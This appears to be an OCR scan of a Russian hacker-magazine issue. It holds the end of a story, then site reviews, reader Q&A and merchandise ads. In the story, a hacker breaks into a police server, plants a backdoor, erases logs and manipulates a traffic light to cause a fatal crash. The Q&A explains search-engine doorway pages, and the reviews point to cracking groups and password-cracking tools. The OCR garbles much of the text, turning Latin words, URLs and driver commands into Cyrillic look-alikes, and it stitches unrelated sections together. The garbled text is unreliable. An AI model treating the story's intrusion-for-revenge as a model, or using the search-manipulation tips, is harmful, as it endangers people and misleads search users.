действительно увидел е-біагу, который вел водила. 
Промотав на несколько страниц назад, он нашел то, 
что искал: 

«Не обновлял дневник больше двух месяцев в связи с 
очень неприятным эпизодом. Я попал в аварию. 
Отказали тормоза, я не смог вырулить на обочину и 
влетел в бок проезжавшей мимо девятки. Скорость 
была в районе 50 км/ч, я после удара вырубился 
сразу. Почти месяц провалялся в больнице с 
многочисленными переломами. Жалко ребят в 
девятке - отец с сыном. Первый не выкарабкался :(. 
Теперь предстоят разбирательства в суде и другие 
трудности. На работе проблемы... Началось, мля». 
Дальше шло еще несколько постов о следователях и 
аварии. Судя по всему, водила был недоволен, что к 
нему вообще предъявляют какие-то претензии. 
Зарегистрировав аккаунт в е-біагу, Оеппу добавил 
урода во френды и периодически задавал ему 
интересующие вопросы. Как бы невзначай. Через 
несколько дней он уже точно знал, во сколько и по 
какой дороге водила едет на работу. Первая часть 
плана была успешно выполнена. 

* * * 

- Оеппу, у меня есть для тебя потрясающая новость! - 
І_еггка была явно чем-то взволнована. 

- Рассказывай! :) 

- Через неделю я еду с родителями в Питер на два дня. 
И мы можем с тобой увидеться. 

Дениса прошиб пот. Как реагировать на это 
сообщение, он не знал. Вернее, он не знал, что 
написать в ответ, так как был в ужасе. І_егга 
однозначно не поймет, если он откажется встретиться, 
но и встретиться с ней он не может. Ведь она ждет 
увидеть загорелого атлета, а не беспомощного 
очкарика-инвалида в коляске. 

- Оеппу, ты здесь? Ты так рад возможности меня 
увидеть, что потерял дар речи? :) 

Денис молчал. Он искал способы выкрутиться, но не 
находил их. Наконец хакер напечатал: 

- Класс! Когда именно ты приедешь? 

- На следующих выходных, скорее всего. 

- Черт. Я, возможно, буду в Екатеринбурге :(. 

- КАК?? 

-Там будет большая ореп-аігтуса. Пообещал ребятам. 
-:[( 

- Еще точно не знаю. Может, поеду, а может, и нет. 

- Оставайся. Пообщаемся в реале. Мне очень хочется 
с тобой познакомиться. 

- Мне тоже, малышка, но ничего не могу обещать. 

- Ладно. Но я буду надеяться, что смогу тебя увидеть. 

- Учту это :). 





Это был один из первых экспериментальных 
светофоров такого рода в России. Установленный на 
Каменноостровском проспекте, недалеко от 
Петроградского метро, он отличался от тысяч 
остальных. Его управление координировалось 
сервером, расположенным в центральном отделении 
МВД. На территории Санкт-Петербурга 
насчитывалось три таких светофора: на Литейном 
проспекте, на Московском проспекте и проспекте 
Энгельса. Власти города установили их всего 
несколько месяцев назад, по примеру японцев. 
Слишком уж участились случаи самостоятельного 
переключения нерадивыми водителями обычных 
светофоров с помощью специальных девайсов, 
которые можно было купить на черном рынке. Но 
именно Каменноостровский светофор привлек 
внимание хакера - через него проходил маршрут 
водилы от дома до работы. 

Принцип работы новых светофоров был довольно 
прост. Внутри находилась система контроля с 
передатчиком, которая получала беспроводной 
зашифрованный сигнал от сервера в МВД. Помимо 
защиты от несанкционированных переключений, 
плюсом системы было то, что при образовании пробок 
или проезде ѴІР-пассажиров можно было 
проконтролировать трафик без участия 
регулировщика. 

Вмешаться в работу светофора можно было, взломав 
сервак и направив через него ложный сигнал. Денис 
знал, что бывает, если в час пик машина проезжает на 
красный свет. И намеревался продемонстрировать это 
водиле наглядно. 

Получить доступ к серверу МВД особого труда не 
составило. Сначала Оеппу получил рута на ментовском 
компьютере с выходом в инет, затем через него проник 
во внутреннюю сеть. А уже находясь во внутренней 
сети, обнаружил большой сервак с толстым каналом и 
перехватил управление на себя. Оеппу действовал 
тихо, постоянно подчищая логи. Меньше всего ему 
хотелось попасться и сесть за убийство убийцы его 
отца. Выходя из системы, он оставил в ней бэкдор. 
Ночью, когда движение машин было минимальным, 
Денис попробовал самостоятельно переключить 
Петроградский светофор. Все сработало как часы. Тут 
же вернув прежний режим, Оеппу снова вышел из 
системы. В этот момент он чувствовал себя Богом, в 
силах которого свершить справедливое правосудие. 
Оставалось сделать только одну вещь... 

* * * 



- Оеппу, я на крыше! 

- Отлично. Установи камеру так, чтобы был виден весь 
перекресток. Все машины вокруг светофора. 

- Да, тут как раз есть подходящее место. 

Через 1 0 минут ЛО отрапортовал: «Г отово!». 

- Проверь, чтоб кабель проходил в безопасном месте, 
нигде не перетирался. 

- Да все в порядке, уже проверил. 

- Ну тогда быстрее настраивай тарелку и сливай 
оттуда. 

Чтобы купить нужное оборудование для крутой камеры, 
которую сейчас устанавливал кардер, Оеппу пришлось 
взломать систему компании «Лукойл» и стащить кое- 
какие данные, которые заказал работодатель. За 
выполнение заказа он получил всего 5 тысяч долларов, 
но этих денег было как раз достаточно, чтобы купить 
хорошую цифровую видеокамеру и передатчик, 
передающий в реальном времени по воздуху 
видеоизображение, кодированное 512-битным 
ключом. Никто никогда не узнает, куда идет поток и для 
чего здесь установили камеру. Этого не знал даже Лое\ 
ОитЬег, находящийся на крыше здания, 
возвышающегося над светофором. Он просто 
исполнял указания друга. 





Когда сообщил, что все готово, Оеппу включил 
ресивер, купленный в интернет-магазине и 
доставленный днем ранее прямо на дом. Затем 
запустил прогу, установленную с прилагаемого СО, и 
словил картинку. На мониторе показался перекресток 
Каменноостровского проспекта, отчетливо был виден 
светофор и машины. Изображение было плавным, без 
каких-либо рывков. Еще бы, за такие деньги... 

- Все нормально? - послышался голос іЮ в 
портативной рации. 

- Да. Можешь уходить оттуда. 

* * * 

Денис смотрел на фотографию І_егг 5 ы на экране и 
думал. Он уже давно был влюблен в эту девушку, хотя 
ни разу не показывал ей этого. Он боялся, что 
малейшая слабость разочарует ее, убежденную в 
общении с крутым мачо. В этот момент Денис 
ненавидел весь мир. Почему он родился таким? 
Почему с ним произошло то, что произошло? Почему 
он не может быть с девушкой, которая ему так 
нравится? 

А может... 

Безумная мысль промелькнула в голове Оеппу. Может 
быть, если он все-таки найдет в себе мужество и 
пригласит к себе, и она его увидит, она сможет принять 
его таким, какой он есть? Может быть, ей не нужен 
мачо, а просто нужен парень, который ее понимает? 
Денис с тоской посмотрел на свои культи. И тут же со 
злостью сказал сам себе: «Ага, как же, примет». 

Тем не менее, нужно было принимать решение. І_егга 
приезжала в пятницу, и после этого вряд ли скоро будет 
в Питере. Ему давался шанс выяснить, нравится он ей 
только за те декорации, о которых ей наврал, или ее 
привлек его внутренний мир. Денису было просто 
жутко от мысли, что І_егга увидит его ТАКИМ и не 
захочет даже разговаривать. Ведь он обманывал ее 
последние полгода! Но в то же время он хотел ее 
увидеть не меньше, чем боялся этого. И в какой-то 
момент ему нарисовалась другая картина. Девушка 
заходит в его комнату, он встречает ее в своей коляске. 
Жалкий, беспомощный. И тут І_еггка кидается ему на 
плечи и начинает рыдать. «Я буду заботиться о тебе! Я 
никогда тебя не брошу!» - говорит она сквозь 
всхлипывания. Он обнимает ее и... 

От этой картины ему стало легко и хорошо на сердце. И 
Денис решился. Она включил аську и увидел, что І_егга 
в онлайне. Безо всяких «крошка» и прочих понтов, 
Оеппу поприветствовал ее и просто сказал: «Приходи в 
пятницу в 1 9:00 по этому адресу. Я буду ждать тебя». 
«Хорошо :)» - ответила девушка. Денис тут же закрыл 
окно ІСО. 



* * іс 

Время шло мучительно долго, и все-таки пятница 
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наступила. К этому времени все было готово, чтобы 
поквитаться с водилой. Денис знал марку, цвет и 
номера его машины [ярко-красный «москвич», 
купленный после аварии], время, когда он проезжает 
по Петроградке, он в любой момент мог переключить 
светофор и устроить ему тот ад, в который попал сам 
несколько месяцев назад. Но хакер не решался. Он 
боялся последствий, боялся, что что-то пойдет не так. А 
еще что погибнут невинные люди. Но ему нужно было 
покончить со всем до встречи с І_еггой. К тому же, 
тянуть дальше было бессмысленно. Если вершить суд, 
то именно сегодня. И он сделает это, когда водила 
будет возвращаться с работы домой. И пусть он 
выживет, пусть тоже лишится ног, пусть почувствует на 
себе, каково это - быть калекой. 

Оеппу еле дотерпел до вечера. В 1 4:00, за 3 часа до 
того времени, когда водила должен был проезжать 
светофор, хакер стал неотрывно наблюдать за 
монитором. Он в любой момент был готов войти на 
сервер и одним нажатием клавиши поменять цвета на 
светофоре. За прошедшее время показалось три 
похожие машины, но ни одна из них не подходила по 
номерам. Водила не появился ни в 17:00, ни в 17:30. 
Оеппу сидел весь на нервах. Руки у него тряслись. 
Ожидание убийства хуже самого убийства - теперь он 
мог подтвердить это наверняка. Только бы правильно 
подгадать момент... 

Еще один ярко-красный «москвич» показался на 
перекрестке в 17:43. Денис сразу сфокусировал 
изображение на номерах. Это был он. Внутри сидел 
человек, который испортил ему будущее. Пришло 
время ответного хода. 

Денис быстро проник через бэкдор на сервер МВД и, 
пробежавшись по клавишам, вызвал красный свет. 
Поток машин остановился, ожидая зеленого сигнала. 
«Москвич» стоял третьим. Выждав время, Оеппу 
включил зеленый, и поток плавно двинулся вперед. 
Когда «москвич» уже вот-вот должен был пересечь 
перекресток, хакер снова врубил красный. Одна из 
машин, едущих по другой стороне, тут же газанула и 
выехала на перекресток. Ее водитель, конечно, успел 
заметить мелькнувший перед носом красный бок, но 
слишком неожиданно все произошло. Белая «тойота» 
врезалась «москвичу» прямо в бочину с водительской 
стороны. 

Все это произошло на экране буквально в считанные 
секунды. Оеппу видел, как «москвич» от удара 
перевернулся и, проскользив по инерции несколько 
метров, попал под колеса грузовика. Огромные шины 




тут же подмяли под себя автомобиль и его водителя. 
«Тойота» тоже не справилась с управлением и на 
большой скорости въехала в столб. 

Тревожная мысль промелькнула в голове хакера, и он, 
опомнившись, вышел из Сети, удалив все логи со 
следами своего присутствия. При всем желании 
вычислить его не могли. 

Дело было сделано. Не совсем так, как планировалось, 
но все же. Водила, несомненно, был мертв. Люди в 
«тойоте» тоже пострадали. Но не стоит переживать по 
этому поводу - каждый день происходит куча аварий. 
Значит, такова их судьба... 

* * * 

Мама вернулась в полседьмого вечера. Денис 
предупредил, что у них будет гостья, и она, немало 
удивленная, на скорую руку приготовила поесть. После 
правосудия, которое благодаря ему восторжествовало, 
хакер чувствовал себя намного лучше. Он уже не так 
сильно нервничал по поводу предстоящего вечера, 
наоборот, совершенное убийство каким-то образом 
добавило ему уверенности в себе. Он смог! Он и не 
такое сможет, несмотря ни на что. 

Убрав хлам в своей комнате, Денис привел в порядок и 
себя. Побрился, помыл под мышками, одел чистую 
рубашку. Конечно, мачо он даже после этих 
манипуляций не стал, но хотя бы на толику меньше 
походил на ботана-калеку. 

Пытаясь отвлечься от ненужных мыслей «О чем 
говорить?» и «Как себя вести?», Оеппу зашел на апек- 
боЪ.ги и стал читать анекдоты. 

Часы пробили ровно 7. І_егг’ы еще не было. Он 
продолжал ее ждать. Когда прошел час, Оеппу 
запустил аську и посмотрел лог, правильно ли он дал 
адрес. Все было верно. Может она не сможет прийти? 
Эта мысль одновременно и обрадовала и расстроила 
его. Но он продолжать ее ждать. И через два часа, и 
через три, и даже в полночь, когда сознательно уже 
понимал, что ее не будет... 

Он уснул прямо на клавиатуре. А проснулся на 
следующий день, когда уже вовсю светило солнце. 
Денис умудрился проспать 1 2 часов. Первым делом он 
окликнул маму, которая была дома, не приходил ли кто- 
нибудь? Нет. 

Что ж, черт с ней. Не пришла - и ладно. Ей же лучше. 
Оеппу открыл окно браузера и запустил новостной 
сервер. Наверняка уже появилась какая-то 
информация по аварии, произошедшей вчера. Так оно 
и было. Ыеѵѵз.врЬ.ги назвал аварию чудовищной. 
Приложенная фотография демонстрировала смятый в 
блин автомобиль, в котором с трудом угадывался 
«москвич». В результате аварии погибло два человека, 
еще один был ранен. 

Фотографий и фамилий жертв не указывалось, но 
Денис знал, где их можно достать. Он снова зашел в 
компьютерную систему МВД и воспользовался их 
базой данных. Там сохранялась инфа обо всех 
инцидентах на дороге. И авария на Петроградке не 
была исключением. 

Первая фотография иллюстрировала тело водилы. От 
взгляда на него Денису чуть не сделалось плохо. Г руда 
кровавых костей, в которой лишь отдаленно можно 
было признать человека, отнявшего у него ноги. На 
второй фотке был виден водитель «тойоты» - мужчина 
средних лет с разбитой головой. Судя по всему, 
сотрясение мозга, но это он стал единственно 
выжившим. Открыв третью фотографию, Денис 
непроизвольно вздрогнул. 

Из изувеченного салона с пятнами крови на него 
мертвыми глазами смотрела І_егга. Он узнал ее сразу. 
Те же белокурые волосы, та же красота безо всякой 
косметики. Но теперь на ее лице не было улыбки. Было 
лишь удивление и взгляд, в котором читался укор и 
который, казалось, был адресован только ему. 
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русско-ангпийский сповпрь йотов 
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Ч то мы всегда делаем перед тем, как приезжаем в другую страну? Правильно - изуча- 
ем их культуру. А как? Правильно - учимся их матерным выражениям. Без этого никак 
не получится понять чужую нацию. А что делают иностранцы перед тем, как приезжают в 
нашу страну? Правильно - то же самое! А где иностранцы ищут переводы с одного языка 
на другой? Именно на сайте ѵѵш.іпзиіі- 
топдег.сот! Но нам интересен лишь 
линк, который указан в заголовке. По- 
тому что мы порядочные пацаны и зай- 
дем на сайт только ради того, чтобы 
постебаться над тупыми фразами, ко- 
торые составляли отнюдь не русские 
люди :). Зайди и увидь ЭТО своими гла- 
зами :). А иначе уа йЬуі 6т ро уіЬаІи!!! 



Р аз-два. Фредди заберет тебя. Три-четыре. Он уже в 
твоей квартире... Что, не испугался? Ну конечно, ты 
посмотрел последний фильм про Фредди Крюгера и точ- 
но знаешь, что Фред (в простонародии Федя Крюков) уже 
давно мертв, как мамонты после ледникового периода. Но 
на свете есть еще полно вещей, которых стоит бояться. 
Этот сайт посвящен как раз различным ужасностям во 
всех их возможных проявлениях: фильмы ужасов и их ис- 
тория, галерея ада в картинках реальных случаев, для фа- 
натов - ужасные игры, для любителей чтива - ужасные 
рассказы и подлинные истории. Даже игры есть страшные 
и мрачные. А еще мне понравился раздел с обоями для 
рабочего стола. От них мне становится просто не по себе, 
хотя я и поставил себе одни из них. 



Г кровавый сайт 
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Т ы часто смотришь телевизор? А часто ходишь в кинотеатр, чтобы посмот- 
реть новую киноленту? Думаю, если ты нормальный молодой человек, то 
просмотр фильма для тебя является регулярным занятием. А вот некоторые 
люди просматривают 
один и тот же фильм де- 
сятки раз. Думаешь, фа- 
наты? Отчасти :). Прос- 
то такие люди высмат- 
ривают киноляпы - раз- 
личные несостыковки в 
фильмах. Ведь каждая 
сцена снимается не с 
первого дубля, а потом 
еще и монтируется. Вот так и получается, что, например, в «Бригаде» Саша 
Белый и компания ехали на одном «мурзике», а подорвались на другом :). 
Причем подобного рода ляпов на самом деле полно. В каждом фильме хва- 
тает. Не веришь? Посети ресурс ѵѵѵѵѵѵ.кіпоеггог.Ьоот.ги и убедись сам. 

+ + + + + + + + + + + + + -ь + + + + + + -ь + ч- + + + + ч 




Г казанский газ 
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Г два бобро 
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Т ы считаешь, что ты крутой бобер? Не льсти себе! 

В этом мире есть только два по-настоящему крутых 
бобра. Родом они из страны сала - Украины. Но не спе- 
ши джойниться к ним! Это не так-то просто! Сначала 
подготовься. Крутые бобры абы кого не берут в свои ря- 
ды. Для начала придется пройти крутой бобровский тест 
на крутость! На сайте можно почитать философию кру- 
тых бобров и понять, в чем же смысл проекта. А еще там 
можно найти кучу крутых материалов про то, как пика- 
пить теток, стать знаменитым ди-джеем, и всякие другие 
крутые вкусности. Сайт манит своим неординарным, ра- 
дующим глаз дизайном. В общем, стань крутым бобром! 



« 
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парней (не только Русь, значит, богата хакерами :)). Для двух человек 



журнал очень даже неплохой, с уклоном в кодинг и хакинг. С 2003 года выш- 
ло уже 5 номеров, все можно найти на сайте. Материалы на абсолютно раз- 
ные темы. Как пишут сами авторы: «Круг наших интересов очень широк - от 
исследования сетей и программинга до настройки палитры в паинте» :)). Ко- 
нечно же, никакого паинта там нет, зато есть статьи о сетях Х.25, програм- 
минг на Питоне и Асме, криптография, примочки в линухе и многое другое. 
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Г АО, просто РАО. Но очень удобный. Например, захо- 
дим в раздел СгурМоду и видим список вопросов, 
таких как із ХОН епсгурііоп?», «Шаі із 0Е5?», «Ша\ 
із а Ьгиіе Тогсе айаск?» и т.д. Например, если полюбопы- 
тствовать, что такое 0Е5, то можно получить ссылку на 
стандарт в рсК-формате и узнать о разновидности йЕ5 - 
Тгіріе 0Е5. Кроме того, будет отмечено, что 56-битовый 
ключ может быть отбрутфорсен, и порекомендованы 
книги по теме. Многие вопросы, такие как «Восстановле- 
ние пароля от 2ІР-архива», всегда содержат кучу ссылок 
на соответствующие программы для взлома. 



СПМОВЫВОДЯЩИЕСЯ ПРОГИ 



Іииы.пух.пеі /~д іНотрзо/диіпе.ІпЪп 



К огда-то в безвременно скончавшейся рубрике Х-Риггіе проходил конкурс под наз- 
ванием «Кто меньше?», суть которого заключалась в написании самой маленькой 
программки на любом языке программирования, которая бы выводила точную копию 
самой себя. На сайте «ТИе Оиіпе Раде» ты сможешь найти целую коллекцию из сотен та- 
ких программ на самых разных языках: от ВАЗІС’а до такого экзотического, как Мігапсіа. 
Попробуй внести свою лепту, написав подобную программу на своем любимом языке 
программирования, а автор сайта с удовольствием опубликует твое творение. 
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Ц ОРСІ - украинская группа хакеров-кракеров. Это тебе 
не просто сборище энтузиастов-любителей, объеди- 
нившихся с целью так называемого «совместного изучения 
современных технологий». Ребята действуют с размахом: 
анализируют, локализуют и дорабатывают ПО за соответ- 
ствующий гонорар, проводят платные консультации, ока- 
зывают услуги по сетевой безопасности (тоже за бабки, ра- 
зумеется). Судя по списку крякнутых ими программ, ребя- 
та знают себе цену. На сайте присутствуют также статьи 
мемберов группы и ссылки по теме. 




С айт некоего Дмитрия Алексеенко о криптографии, криптоанализе, шифровании, сжа- 
тии, безопасности, защите, РОР. Исходники наиболее криптостойких алгоритмов 
шифрования (Р5А, ЮЕА, ГОСТ, ВІоѵѵПзІі и др.) на языках С/С++. Программы для защиты 
информации. Документа- 
ция, книги, статьи по дан- 
ным темам, новости. Сайт 
также содержит много ерун- 
ды не по теме, вроде «Опи- 
сания настроек ВІ05 Зеіир». 

Короче, е-Сгурі громко себя 
преподносит, но на 
действительно стоящий 
проект по криптографии не 
тянет :(. Хотя тому, кто увле- 
кается темой, посетить сайт 
Дмитрия все же стоит. 

+++++++++++++++++++++++++++++++ 








ѴІ|І Сейчас в интернете развелось немало различных хостинг-контор. Аб- 
солютное большинство предлагает следующий перечень услуг: 
йесіісаіесі зегѵег, СоІІосаііоп, Ѵіііиаі бесіісаіесі зегѵег, Ѵігіиаі Ііозііпд. 
При этом мало кто объясняет, что есть что, зачем и где использует- 
ся. Объясни, пожалуйста, в трех словах суть этих понятий. Чем они 
отличаются? 

(Т) 

По-моему, ты изучаешь услуги неправильных провайдеров, которые 
предоставляют неправильный сервис. По крайней мере, о существова- 
нии понятия «маркетинг» они, по всей видимости, не подозревают. Другой бы 
на их месте представил бы свои услуги в лучшем виде: подробно бы объяснил 
разницу и сделал бы все возможное, чтобы у тебя слюнки потекли от желания 
поскорее заказать его услуги :). 

ОесЛсаІесІ зегѵег (выделенный сервер) - компьютер, принадлежащий хозяину 
технической площадки (хостеру), на которой он установлен, и сдаваемый в 
аренду целиком и полностью одному клиенту. Последнему предоставляются 
полные права на управление системой. На основе выделенных серверов рабо- 
тает множество небольших хостинг-провайдеров, не имеющих своей собствен- 
ной технической площадки. 

5еті йесіісаіесі - сервер, сдаваемый в аренду одновременно двум или трем 
клиентам. Нередко встречаются ситуации, когда клиентам абсолютно не нужны 
предлагаемые мощности сервера. Они чисто физически не могут загрузить сер- 
вер по самое не хочу, а платить за простой сервера, как понимаешь, не самое 
удачное вложение денег. Таким клиентам резонно купить один сервер и разде- 
лить его ресурсы в соответствии с потребностями. 

СоІІосаііоп (размещение серверов) - размещение физического сервера, при- 
надлежащего заказчику, на арендованной у хостинг-провайдера площади с подк- 
лючением сервера к локальной сети хостера. Возможности в этом случае полу- 
чаются те же, что и у йесіісаіесі зегѵег, однако платить за это удовольствие ты бу- 
дешь намного меньше. Единственный минус - услуги соііосайоп, как правило, 
сопровождаются большой платой за установку. Более того, по понятным причи- 
нам едва ли ты сможешь установить свой сервер на забугорной площадке. 
Ѵігіиаі сіесіісаіесі зегѵег (виртуальный выделенный сервер) - отдельная выде- 
ленная система, занимающая не целый сервер, а лишь его часть. Администра- 
тор \Ю5 - полноценный гео! своей ипіх-системы с возможностями и доступом к 
полному конфигурированию и администрированию системы, исключая ее аппа- 
ратную часть. 

Ѵігіиаі Мозйпд (виртуальный хостинг) - поддержка более чем одного домена на 
одном физическом сервере. Самый распространенный сервис, подходящий 
широкому кругу потребителей. Если тебе всего-то нужно разместить в инете 
сайт - это определенно то, что нужно. 



Задавая вопрос, подумай! Не стоит мне посылать 
вопросы, так ипи иначе связанные 
с хаком/кряком/фриком, для этого есть Ііаск-іац 
(ІіаскІадігеаІ.хакер.ш), не стоит также задавать 
откровенно ламерские вопросы, ответ на которые 
ты при определенном желании можешь найти и сам. 
Я не телепат, поэтому конкретизируй вопрос, 
присыпай как можно больше информации. 

ѴЦу Гуляя по различным форумам веб-дизайнерской направленности, не 
раз встречал упоминание о так называемых дорвеях (боопл/ау). Гово- 
рят, что это реальный способ раскрутить сайт, повысить его позицию 
в различных рейтингах и релевантность в поисковых системах. А мож- 
но рассказать чуть подробнее о том, что это такое и с чем это едят? 

( П } 

Раскрутка сайта - неотъемлемый этап развития любого интернет-про- 
екта. При этом раскрутить сайт под силу далеко не каждому. Нужно учи- 
тывать многочисленные нюансы, использовать все доступные решения, не упус- 
кать ни единой возможности. Зачастую этим занимаются профессионалы, име- 
ющие в своем арсенале не один десяток различных приемов. Давно известно, 
что при грамотном подходе с поисковых систем идет внушительное количество 
трафика (посетителей). Одним из подходов, используемых для увеличения это- 
го самого трафика, является создание так называемых дорвеев - промежуточных 
веб-страничек, которые не зависят напрямую от конечного сайта, но ссылаются 
на него. Смысл их создания заключается в специальной оптимизации и подгон- 
ке под алгоритмы поиска различных поисковых систем. Благодаря используе- 
мым приемам, дорвеи оказываются на верхушке результатов поиска, привлекая 
тем самым внимание потенциальных посетителей. А после того как посетитель 
зайдет на дорвей, он так или иначе попадет на главный сайт. Выгода создания 
таких сайтов очевидна. 

Однако не все так просто. Каждый из ведущих поисковиков использует свои 
собственные алгоритмы поиска, и подход к каждому из них должен быть инди- 
видуальным. Хотя, конечно, есть и общие моменты. Самая главная фишка - пос- 
тоянное повторение и использование в тексте ключевых слов. Эти слова поме- 
щаются повсюду: вверху страницы дорвея, в ее названии, в мета-тегах и, конеч- 
но же, в содержании. При этом использование бессмысленных сочетаний слов 
неприемлемо. Используются структурированные и имеющие вполне определен- 
ный смысл предложения. 

Само собой разумеется, что разработчики поисковых систем не дремлют и ак- 
тивно борются с такого рода жульничеством. И если раньше было достаточно 
слепить примитивную страничку, напичкав ее ключевыми словами и ссылкой 
«нажми здесь» (как вариант, с реализованным редиректом на основе мета-тегов 
или іаѵа-скриптов), то теперь такой номер не пройдет. Подобное безобразие по- 
исковики быстро отфильтруют из своих индексов, или, если твои действия им 
очень сильно не понравятся, того хуже - забанят ко всем чертям еще и реклами- 
руемый сайт. Поэтому неудивительно, что в последнее время дорвеи значитель- 
но преобразились: сейчас они представляют собой полноценные страницы, име- 
ющие подобающее содержание. Посетителю предоставляется вполне конкрет- 
ная информация, однако выдается она не в полном объеме. Для получения ее 
полного варианта предлагается пройти по ссылке на основной сайт. Лихо? Не- 
сомненно, но довольно геморройно. Не думай, что ты сможешь облегчить себе 
жизнь, скачав первый попавшийся свободно распространяемый генератор дор- 
веев. Бьюсь об заклад, что его плоды в момент распознают даже автоматичес- 
кие роботы поисковиков. Что там говорить о модераторах... Так что если и бе- 
решься за это дело, то не поленись заняться им вручную. Сайт ѵѵш.$еагсІіепдіпе$.ги 
тебе в помощь. Обязательно посети его! 









Никак не могу найти информацию по установке драйверов ОѴВ-карты 
5ку5іаг2 на свежеустановленную Ресіога Соге 2. Хочу пошаговое 
руководство! 



Соответствующие драйвера имеются в системе, однако их нужно 
подключить и настроить. Все описанные ниже действия, само собой 
разумеется, нужно выполнять с правами гооі’а. 

О. Добавь в файл /еіс/тосІргоЬе.сопі две следующие строчки: 

аііаз $ку$іаг $ку$іаг2 
аііаз ігопіепсі $іѵ0299 



ПО КАТАЛОГАМ 



САМЕР08Т С ДОСТАВКОЙ НА ДОМ 



мллллг.е-зкор.гіі \ѵѵѵ. хакер. ги ѵѵѵ/ѵу.датерозі.ш 



ТОВАРІ 
В СТИЛІ 

®Й|, 



Пивная кружка 

со шкалой с логотипом 

"Хакер" 



О. Далее нужно создать устройство /сІеѵ/сІѵЬ. Для этого понадобится специ- 
альный скрипт МАКЕОЕѴ-ОѴВ.зіі, входящий по умолчанию в известный набор 
драйверов для РѴВ-устройств Ііпихіѵ (шѵѵ.Ііпихіѵ.огд). Просто запусти его безо 
всяких параметров. 

®. Сделал? Отлично! Теперь создай группу «ѵібео» и пропиши в нее всех 
пользователей, которые должны иметь доступ к твоей ШВ- карте. 

©. После этого добавь в /еіс/гс.іосаі следующее: 

тофгоЬе $ку$іаг апсі 
тофгоЬе ігопіепй 

Ѳ. Набери в консоли команду сіплезд. В ответ она должна вывести что-то вро- 
де этого: 

(1 гі ѵегз/теб іа/сі ѵЬ/Ь2с2/$ку$1:а г2.с: РІехСорІІ(геѵ.ІЗО) сііір Роипб 
сі гі ѵегз/тесі іа/(1 ѵЬ/Ь2с2/$ку$1:а г2.с: іііе сііір Іш 6 Ріагбѵѵаге ЛІІегз 
ОѴВ: гедізіегіпд пеѵѵ агіаріег (ТесІіпі$аі $ку$іаг2 бгіѵег). 
ргоЬе.іипег: ігу іо аііасіі іо Тесііпізаі ЗкуЗіаг2 бгіѵег 
бгіѵег$/тесІіа/с]ѵЬДгопіеп(]$/$іѵ0299.с: зеіир іог іипег Затзипд ТВМІІ24112ІМВ 
ОѴВ: гедізіегіпд Ргопіепб 0:0 (ЗТѴ0299/ТЗА5059/5И935 Ьазесі)... 

Если появится сообщение об ошибке, то в /еіс/тосІргоЬе.сопі нужно попробо- 
вать подключить другой аііаз ігопіепсі. 



® 



Витая пара различается по категориям, правильно? А чем друг от 
друга отличаются категории, и почему сейчас продают только 5 и 6? 



Кабель на основе неэкранированной медной пары различают по его 
пропускной способности, выделяя тем самым несколько категорий: 
О. Категория 3: частота передачи сигналов у кабеля этой категории не пре- 
вышает 16 МГц. Это совсем немного, поэтому используется он только в сетях 
со скоростью до 10 Мбит/с. 

О. Категория 4: кабель передает данные с частотой до 20 МГц, поэтому мо- 
жет обеспечить передачу данных уже до 16 Мбит/с. Как ни крути, а все равно 
это слишком мало. 

®. Категория 5: величина частоты передачи сигналов у этой категории кабе- 
лей значительно подросла и составляет порядка 100 МГц при синхронной пе- 
редаче и 155 МГц - при асинхронной. Здравствуйте, 100 Мбит/с. 

©. Категория 5е: ширина полосы пропускания та же, что и у предыдущей ка- 
тегории. Однако здесь применяется ряд очень важных технологий, которые 
обеспечивают возможность параллельной передачи по четырем парам однов- 
ременно и в обоих направлениях для сетей 1 0ООВазеТ, ОідаЬіі Еіііегпеі. 

Ѳ. Категория 6: само совершенство (пока, по крайней мере). Частота такого 
кабеля доходит до 250 МГц, что почти в два раза больше пропускной способ- 
ности категории 5е. Минимальные потери, минимальное затухание, макси- 
мальная помехозащищенность. 



ЗАКАЗЫ ПО ИНТЕРНЕТУ - КРУГЛОСУТОЧНО! 
ЗАКАЗЫ ПО ТЕЛЕФОНАМ: 

( 095 ) 928-6089 ( 095 ) 928-0360 ( 095 ) 928-3574 




ДА! 



Я ХОЧУ ПОЛУЧАТЬ 

БЕСПЛАТНЫЙ КАТАЛОГ 

ТОВАРОВ В СТИЛЕ X 



ИНДЕКС _ 
УЛИЦА _ 



ОТПРАВЬТЕ КУПОН ПО АДРЕСУ: 101000, МОСКВА, ГЛАВПОЧТАМТ, А/Я 652, Е-ЗНОР 




* - у.е. = убитые еноты 



Футболка "Сгаск те" с логотипом 
"Хакер" темно-синяя, серая 



Толстовка ѴУѴУШ - Ше ѴѴап* ѴУошеп 



Футболка Кііі Віи 6аіе$ 
с логотипом "Хакер" желтая, черная 



с логотипом "Хакер" темно-синяя 



Зажим для денег 
"Хакер - деньги" 



Зажигалка металлическая с 
гравировкой с логотипом журнала 
"Хакер" 



Коврик для мыши "Опасно для жизни" 
с логотипом журнала "Хакер" 
(черный) 

— — — — — — 
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Все чаще и чаще стал замечать, что заграничные сервисы предлага- 
ют услуги по ценам, значительно меньшим, нежели наши отечествен- 
ные аналоги. Однако воспользоваться ими не могу, т.к. сразу же воз- 
никает проблема с оплатой. Для последней необходимо иметь кре- 
дитную карту, которой у меня пока нет :(. Упущение это хочу в бли- 
жайшее время исправить, однако в финансах весьма ограничен. Неп- 
лохой, как мне кажется, вариант - Ѵіза ЕІесігоп. Обслуживание стоит 
копейки, да и первоначальных взносов никаких. Как ты считаешь? 



Что ты! Ѵіза Еіесігоп, ровно так же, как и распространенные 
Сіггиз/Маезіго, являются электронными картами. Поэтому принимают- 
ся они только в банкоматах и торговых точках, оснащенных электронными тер- 
миналами. Об оплате сервисов в интернете с помощью этих кредиток даже и 
речи идти не может. Но не расстраивайся, альтернатива на самом деле есть! 
Если покупки в интернете - это единственная цель приобретения кредитки, то 
тебе подойдет вариант виртуальной кредитной карты. Очень интересная услу- 
га, при которой банк физически тебе никакой карты не выдает, а предоставля- 
ет лишь ее реквизиты, необходимые для оплаты товаров и услуг в интернете. 
Главный плюс в этом случае - стоимость ее обслуживания. Думаю, три долла- 
ра в год, даже в условиях жесткой финансовой ограниченности, выделить мож- 
но. Такую услугу в России предоставляет, например, Альфа-банк (мѵѵѵ.аірііас- 
агсі.ги), предлагающий изготовление (если это так можно назвать) карт типа 
МазІегСагсІ Ѵіііиаі. 

В том случае, если ты хочешь, чтобы твой кошелек все-таки был украшен кус- 
ком разноцветного пластика, то советую посмотреть в сторону классических 
(сіаззіс) МазІегСагсІ и Ѵіза. Этот тип карт любят, ценят и принимают везде! Ра- 
зумеется, и в Сети тоже. Их изготовлением занимается большинство отечест- 
